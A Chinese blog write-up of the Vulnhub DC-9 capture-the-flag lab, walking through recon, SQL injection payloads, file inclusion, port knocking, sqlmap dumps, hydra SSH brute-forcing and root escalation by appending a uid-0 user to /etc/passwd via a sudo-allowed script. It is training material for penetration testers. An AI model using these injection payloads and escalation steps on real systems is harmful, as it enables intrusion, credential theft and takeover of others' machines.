VulnhubDC-9靶场WriteUP

博客 动态
0 539
优雅殿下
优雅殿下 2023-03-05 21:26:43
悬赏:0 积分 收藏

Vulnhub DC-9靶场WriteUP

Recon

??首先使用netdiscover扫描靶机,靶机IP地址为192.168.244.135

┌──(kali?kali)-[~]
└─$ sudo netdiscover -r 192.168.244.0/24
 Currently scanning: 192.168.244.0/24   |   Screen View: Unique Hosts                                                        
 
 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.244.1   00:50:56:c0:00:08      1      60  VMware, Inc.                                                              
 192.168.244.2   00:50:56:f7:b2:38      1      60  VMware, Inc.                                                              
 192.168.244.135 00:0c:29:e4:f7:0d      1      60  VMware, Inc.                                                              
 192.168.244.254 00:50:56:ed:d6:50      1      60  VMware, Inc.   

??随后使用Nmap对靶机进行扫描,发现22端口被过滤,80端口开启。

┌──(kali?kali)-[~]
└─$ sudo nmap -sF 192.168.244.135
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-05 04:04 EST
Nmap scan report for 192.168.244.135
Host is up (0.0017s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE         SERVICE
22/tcp filtered      ssh
80/tcp open|filtered http
MAC Address: 00:0C:29:E4:F7:0D (VMware)

Nmap done: 1 IP address (1 host up) scanned in 14.40 seconds

Sql Inject

??尝试访问Web服务。

??在Search部分测试SQL注入。

??使用order by猜测列数,得出返回6列数据。

??通过union select获得列数。

??获取数据库名和当前数据库版本。

??获得当前数据库中存在的表名。```

Fred' union select 1,2,3,4,database(),group_concat(table_name) from information_schema.tables where table_schema=database();#

??查看表的字段名,

Fred' union select 1,2,3,4,5,group_concat(UserID,Username,Password) from Staff.Users;#

??获得用户名和密码Hash后,对Hash进行破解,然后在Web界面登录。
用户名密码为:admin:transorbital1

??通过Manage界面的File does not exist,我们猜测文件包含漏洞。通过BurpSuite进行爆破尝试。

这里需要注意,发送请求时不能URL编码Payload。

??接下来的我们获得了用户名,但是SSH端口并没有开启,在/etc下我们发现了/etc/knockd.conf,Knockd保护了SSH端口的开启与关闭,根据Knockd的配置,我们只有按顺序访问指定端口,才能开启SSH端口。

??根据配置文件我们可知,按顺序访问7469,8475,9842端口可以打开SSH端口。我们可以用nc或nmap来Knock。

┌──(kali?kali)-[~]
└─$ nc 192.168.244.135 7469
(UNKNOWN) [192.168.244.135] 7469 (?) : Connection refused

┌──(kali?kali)-[~]
└─$ nc 192.168.244.135 8475
(UNKNOWN) [192.168.244.135] 8475 (?) : Connection refused

┌──(kali?kali)-[~]
└─$ nc 192.168.244.135 9842
(UNKNOWN) [192.168.244.135] 9842 (?) : Connection refused

┌──(kali?kali)-[~]
└─$ sudo nmap -sV -p22 192.168.244.135
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-05 06:20 EST
Nmap scan report for 192.168.244.135
Host is up (0.0011s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
MAC Address: 00:0C:29:E4:F7:0D (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.69 seconds

Brute

??我们现在已经开了SSH端口,但我们没有SSH的用户名与密码,我们尝试sqlmap,将数据库的内容导出,尝试爆破SSH用户和密码。我们首先将注入点的HTTP请求内容保存至文件。

POST /results.php HTTP/1.1
Host: 192.168.244.135
Content-Length: 21
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.244.135
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.244.135/search.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

search=%27or+1%3D1%23

??然后使用如下命令导出表中内容。

┌──(kali?kali)-[~/Labs/DC-9]
└─$ sqlmap -r inject.txt -D users -T UserDetails --dump  
······

[06:54:44] [INFO] table 'users.UserDetails' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.244.135/dump/users/UserDetails.csv'

??随即处理文件内容然后进行爆破。

┌──(kali?kali)-[~/Labs/DC-9]
└─$ mv /home/kali/.local/share/sqlmap/output/192.168.244.135/dump/users/UserDetails.csv ./user.txt

┌──(kali?kali)-[~/Labs/DC-9]
└─$ cut user.txt -d "," -f "3" > passwd.lst

┌──(kali?kali)-[~/Labs/DC-9]
└─$ cut user.txt -d "," -f "5" > user.lst  

┌──(kali?kali)-[~/Labs/DC-9]
└─$ hydra -L user.lst -P passwd.lst ssh://192.168.244.135
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-05 06:57:02
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 361 login tries (l:19/p:19), ~23 tries per task
[DATA] attacking ssh://192.168.244.135:22/
[22][ssh] host: 192.168.244.135   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.244.135   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.244.135   login: janitor   password: Ilovepeepee
[STATUS] 341.00 tries/min, 341 tries in 00:01h, 21 to do in 00:01h, 15 active
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-05 06:58:08

??获得密码后,我们尝试登录提权。三个账户都没有sudo权限,但janitor用户目录下有隐藏文件。

janitor@dc-9:~$ ls -la
total 16
drwx------  4 janitor janitor 4096 Mar  5 21:57 .
drwxr-xr-x 19 root    root    4096 Dec 29  2019 ..
lrwxrwxrwx  1 janitor janitor    9 Dec 29  2019 .bash_history -> /dev/null
drwx------  3 janitor janitor 4096 Mar  5 21:57 .gnupg
drwx------  2 janitor janitor 4096 Dec 29  2019 .secrets-for-putin
janitor@dc-9:~$ cd .secrets-for-putin/
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt 
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts

??我们使用这些密码再次进行爆破。

┌──(kali?kali)-[~/Labs/DC-9]
└─$ hydra -L user.lst -P newpass.lst ssh://192.168.244.135
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-05 07:06:04
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 114 login tries (l:19/p:6), ~8 tries per task
[DATA] attacking ssh://192.168.244.135:22/
[22][ssh] host: 192.168.244.135   login: fredf   password: B4-Tru3-001
[22][ssh] host: 192.168.244.135   login: joeyt   password: Passw0rd
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-05 07:06:27

??查看sudo -l权限。

fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fredf may run the following commands on dc-9:
    (root) NOPASSWD: /opt/devstuff/dist/test/test

??进入到该可执行文件的上层目录查看test.py的源码。

#!/usr/bin/python

import sys

if len (sys.argv) != 3 :
    print ("Usage: python test.py read append")
    sys.exit (1)

else :
    f = open(sys.argv[1], "r")
    output = (f.read())

    f = open(sys.argv[2], "a")
    f.write(output)
    f.close()

??通过分析源码,我们知道该程序接收三个参数,读取第二个参数并写入第三个参数,那么我们就可以构造一个拥有root权限的用户写入/etc/passwd文件中,从而提权。我们首先通过程序读取shadow文件的内容,获得一个我们已知密码的用户。

fredf@dc-9:/opt/devstuff$ sudo ./dist/test/test /etc/shadow ./shadow
fredf@dc-9:/opt/devstuff$ cat shadow 
······
janitor:$6$bQhC0fZ9g9313Aat$aZ0GecSMTi1qUGqSF6eAdGu2pDXRg1Zu8JzLyyhvSAwh8MnLzv3XPnu6Vw9OruPsgAGgA2dCYdOuk9T4hgDZ6/:18259:0:99999:7:::

??我们修改这条内容为如下内容。并保存在/tmp/test下。
hacker:$6$bQhC0fZ9g9313Aat$aZ0GecSMTi1qUGqSF6eAdGu2pDXRg1Zu8JzLyyhvSAwh8MnLzv3XPnu6Vw9OruPsgAGgA2dCYdOuk9T4hgDZ6/:0:0:root:/root:/bin/bash

??然后通过test程序进行写入(请使用单引号),并su提权(这里要提交janitor的密码)。

fredf@dc-9:/opt/devstuff$ echo 'hacker:$6$bQhC0fZ9g9313Aat$aZ0GecSMTi1qUGqSF6eAdGu2pDXRg1Zu8JzLyyhvSAwh8MnLzv3XPnu6Vw9OruPsgAGgA2dCYdOuk9T4hgDZ6/:0:0:root:/root:/bin/bash' > /tmp/test

fredf@dc-9:/opt/devstuff$ sudo ./dist/test/test /tmp/test /etc/passwd

fredf@dc-9:/opt/devstuff$ su hacker

??提权后成功获得FLAG。

posted @ 2023-03-05 20:51  ZywOo  阅读(0)  评论(0编辑  收藏  举报
回帖
    优雅殿下

    优雅殿下 (王者 段位)

    2017 积分 (2)粉丝 (47)源码

    小小码农,大大世界

     

    温馨提示

    亦奇源码

    最新会员